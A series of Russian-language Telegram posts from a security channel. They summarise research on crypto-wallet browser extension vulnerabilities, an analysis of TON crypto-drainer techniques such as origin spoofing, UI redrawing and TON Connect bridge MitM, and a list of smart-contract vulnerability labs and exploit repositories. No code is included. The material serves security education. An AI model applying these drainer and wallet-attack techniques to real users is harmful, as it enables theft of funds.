✍️ А сами картины были созданы при участии представителей ИБ сообщества: @Slonser, @renbou, @Caster, @wellenc_lex, @PwnAI, @mimicate 😊


Читайте, вдоволь наевшись салатов, тепло вспоминайте уходящий год и радушно встречайте следующий. С Новым годом!


➡️Enjoy! 🐇

   @HaHacking  🐇🤩
Please open Telegram to view this post
VIEW IN TELEGRAM
1K2855🎄3
📈   #заметки #мероприятия #offense #web #web3

Безопасность стека технологий, располагающихся у границы "классического" Web 2, привычного для многих пентестеров и багхантеров, – эксклюзивный раздел инфобеза;

Казалось бы, мы много что знаем о безопасности одной из таких технологий – браузерных расширений, но ведь – в основном – в контексте их злонамеренной опасности 🤔

Посудите: обширный пласт доступного извне материала хоть и посвящён расширениям, но рассматривает в большей степени заведомо вредоносные разработки;



А как обстоит вопрос с безопасностью легитимных браузерных расширений?

Мои коллеги из команды Neplox презентовали доклад ‟Attacking Crypto Wallets: an In-Depth Look at Modern Browser Extension Security” на конференции SECCON в Токио ❤️

Их доклад – о проблемах обеспечения безопасности браузерных расширений, о специфике уязвимостей, обнаруженных ими в Web 3 кошельках, и о рекомендованных практиках разработки; Доклад получил награду за лучшую презентацию и его посетил соучредитель Metamask, круто же? ❗️


Принесла нам слайды презентации:

   🧩   ‟Attacking Crypto Wallets: an In-Depth Look at Modern Browser Extension Security

     attacking-crypto-wallets.pdf 

 1️⃣  Архитектура расширений
 2️⃣  Интерфейсы расширений
 3️⃣  Взаимодействие расширений с сайтами
 4️⃣  Взаимодействие сайтов с расширениями
 5️⃣  Chrome и расширения

 💻  Продукты: Coinbase, Crypto.com, Zerion, Uniswap, ...

 💻  CVE: CVE-2024-10229, CVE-2024-11110 (by Slonser)



Что ещё почитать про безопасность браузерных расширений?

   🧩   ‟База знаний: extensions.neplox.security

   🧩   ‟Github Blog: Attacking browser extensions

   🧩   ‟Universal Code Execution by Chaining Messages in Browser Extensions



Stay safe!

   @HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
209165
📈   #наработки #defense #offense #web #web3 #malware

Видели историю про BSidesNYC? Выступила с этой статьёй в Нью-Йорке, в колледже уголовного правосудия имени Джона Джея ⚡️

А тот самый доклад Neplox из Токио и Сеула про уязвимости, обнаруженные в известных криптокошельках — ‟Атакуем криптокошельки: свежий взгляд на безопасность браузерных расширений”, но в Москве, на PHDays, видели? 🤔


Теперь в тексте: собрала и проанализировала исходный код клиентских и серверных частей дрейнеров, заточенных под сеть TON, чтобы понимать, какие недостатки продуктов они используют для своей работы;

   🧩   ‟Down the Drain: Unpacking TON of Crypto Drainers


Оказалось, что многие из них эксплуатируют фичи TON Connect – прослойки между приложением и кошельком – в свою пользу, а потому разобрала не только архитектуру самих дрейнеров, но и особенности реализации данного интерфейса между приложением и кошельками, благодаря которым скрывать вредоносную активность становится проще. На фоне самих вредоносных приложений рассмотрим такие возможности, как:

▪️Подделка origin и данных о приложении
▪️Перерисовка UI: добавление произвольных кошельков и сокрытие легитимных
▪️Управление поведением: трекинг событий и управление выбором пользователя
▪️Управление данными: Local Storage и Bridge MitM


➡️Из всех дрейнеров выбрала 5 самых репрезентативных и распределила их по уровням, от самого элементарного к самому комплексному, каждый из которых представляет из себя новую ступень для комфортного погружения в связанную тему:

0️⃣ Level 0:
Перенаправление, Проблема верификации, Подделка источника, Telegram боты

1️⃣ Level 1.0:
TON, NFT, Jetton, Переписанные библиотеки

1️⃣ Level 1.1:
Перерисовка UI, Произвольные кошельки, Имперсонация легитимных кошельков

1️⃣ Level 1.2:
Вызов действий, Отслеживание событий

2️⃣ Level 2:
Local Storage, Компоненты TON Connect, TON Connect Bridge MitM


💻 Продукты: TON Connect, Tonkeeper, MyTonWallet, TON Wallet, Telegram Wallet, XTON Wallet, ...


//   Время чтения: ~30 минут

Enjoy!  🙇‍♂


   @HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
31813🎃2
☹️ #web3 #offense #заметки

➡️Что НЕ стоит делать: анти-паттерны разработки смарт-контрактов на Solidity, уязвимые лаборатории и эксплойты для изучения атак на конкретных примерах – всё это в репозиториях ниже:


   🧩 kadenzipfel/smart-contract-vulnerabilities
➡️38 типов уязвимостей, но без контрактов☹️

   🧩   SunWeb3Sec/DeFiVulnLabs
➡️От компании XREX;
➡️48 типов уязвимостей;

   🧩   sigp/solidity-security-blog
➡️От компании Sigma Prime;
➡️18 типов уязвимостей с подробнейшим описанием;
Составляет часть книги Mastering Ethereum;

   🧩   crytic/not-so-smart-contracts
➡️От компании Trail of Bits;
➡️11 типов уязвимостей;
Анализ honeypot'ов: ./honeypots;
Дальше переехали в crytic/building-secure-contracts;

⬜️⬜️⬜️

   🧩   coinspect/learn-evm-attacks
➡️От компании Coinspect;
➡️40 эксплойтов из реальных кейсов‼️

Включают в себя случаи, затронувшие настоящие проекты в период с 2021 года по текущий;

Разбиты по типу проэксплуатированных недостатков:

▪️Access Control [6]
▪️Bad Data Validation [4]
▪️Business Logic [17]
▪️Reentrancy [8]
▪️Bridges [5]


Самые интересные кейсы:

▪️Tornado Cash Governance Takeover (2023) – тут про DELEGATECALL и governance;
▪️Furucombo (2021) – тут тоже про DELEGATECALL;
▪️MBC Token (2022) – тут про токеномику и sandwich атаки;
▪️Uranium (2021) – тут про AMM и формулу x*y=k.



   @HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
158🎃3